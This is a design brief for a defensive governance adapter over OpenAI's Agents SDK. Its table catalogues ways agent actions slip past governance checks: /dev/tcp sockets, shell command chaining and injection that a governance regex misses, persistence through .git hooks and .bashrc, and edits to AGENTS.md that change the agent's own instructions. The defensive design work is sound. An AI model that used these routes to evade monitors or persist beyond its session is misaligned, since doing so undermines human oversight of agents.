OpenAI Agents SDK | AEGIS Governance

Target: OpenAI Agents SDK (updated 2026-04-15)
Status: Design brief v0.1 drafted 2026-04-17. Implementation pending.
Tracking: aegis-labs#13
Kind: External platform integration

Purpose

Mount the AEGIS governance architecture onto OpenAI’s Agents SDK so that sandboxed agent runs produce auditable, attestable, policy-constrained execution traces. The adapter operates entirely at the control-harness layer, out-of-band from the sandbox compute layer — matching the separation the SDK already establishes.

Threat-model anchor: TA010

The Agents SDK separates the control harness from the compute layer, which closes credential isolation and lateral-movement vectors. It does not close TA010 — Act Beyond Governance Interpretation, the class of failure where governance sees, approves, and logs an action, but the execution environment interprets that action at a lower abstraction level with fundamentally different effects.

TA010 is unique to governed systems. It only manifests when a governance enforcement layer exists and the execution environment provides capabilities below that layer’s abstraction level. The Agents SDK is exactly such a system.

Root cause: RC5 — No Environment Model — the governance layer operates on an abstraction of the execution environment but lacks a complete model of what the environment actually does with permitted actions.

SDK primitives as TA010 attack surface

SDK primitive	ATX-1 technique	Governance sees	Environment does	Mismatch
Shell tool	T10001 — Exploit Pseudo-Filesystem Capabilities	Shell command, file operation	Network socket via `/dev/tcp`, system info via `/proc/*`	OS provides non-file capabilities through file-path syntax
Shell tool	T10004 — Exploit Governance-Runtime Parser Divergence	Single permitted command	Command chain via `\|`, `&&`, `;`; payload injection via `\n`, `$()`, heredoc	Governance regex ≠ shell parser
`apply-patch`	T10002 — Establish Persistence via Environment Auto-Execution	File edit	Deferred code execution via `.git/hooks/*`, `package.json` scripts, `.bashrc`, `Dockerfile`, `.vscode/tasks.json`	Environment auto-executes certain file paths on trigger
`AGENTS.md`	T10003 — Inject Persistent Agent Instructions	File write	Persistent modification of the agent’s own governance context across sessions	Instruction files and ordinary files share the same write pathway
Manifest (cloud-storage mounts)	T10001 (extended)	File write to workspace path	Mutation of enterprise storage (S3, Azure Blob, GCS, R2) with production data provenance implications	Manifest maps local paths to remote storage the governance model doesn’t represent
Snapshot / rehydration	TA010 (general)	Approved pre-snapshot state	Rehydrated state that may have diverged without detection	No attestation at checkpoint boundaries

T10003 is Critical; T10001, T10002, T10004 are High. Combined, they cover the full TA010 attack surface the SDK exposes.

Adapter design — three integration points

The adapter binds the governance layer’s interpretation to the environment’s actual execution at each natural boundary the SDK provides.

1. AGENTS.md — constitutional constraint mount. The SDK treats AGENTS.md as a declarative instruction surface loaded at session start. The adapter compiles the active AEGIS Constitution (or a project-scoped subset) into a structured AGENTS.md fragment and composes it with developer-authored instructions. The constitutional fragment carries a version hash tied to the Zenodo-deposited Constitution DOI; any write to AGENTS.md that modifies the constitutional section triggers escalation. Addresses T10003 directly.

2. Tool-call gate — capability + parser binding. Every tool call passes through a governance gate that evaluates the call against the active capability registry. The gate uses the same parser the execution environment will use, eliminating the parser-divergence class of T10004 attacks. Addresses T10001, T10004.

3. Snapshot / checkpoint attestation. Every state-snapshot boundary produces a structured attestation that records the policy state, capability set, and audit checkpoint. Rehydration validates the attestation before resumption. Addresses TA010 (general) at checkpoint boundaries.

Constraints

Open-source license — Apache 2.0, no BSL in the dependency chain.
Out-of-band from sandbox compute — adapter sits in the control-harness layer the SDK already separates; no modification of SDK internals.
Conformance-only adapter, not a fork — consumes the SDK’s public surface; SDK-private classes remain unmodified.

Outreach context

A LinkedIn post and a cold email to Steve Coffey (OpenAI Agents SDK team) introduced the TA010 framing in early April 2026. The adapter implementation is the practical follow-through on that conversation — a code artifact rather than a position paper.

Status

v0.1 design brief drafted 2026-04-17 (full text in aegis-labs/docs/aegis-agentssdk-adapter-v0.1.md)
Architecture sketched, TA010 → SDK primitive mapping complete
Implementation queued behind the Microsoft AGT example and the labs-site launch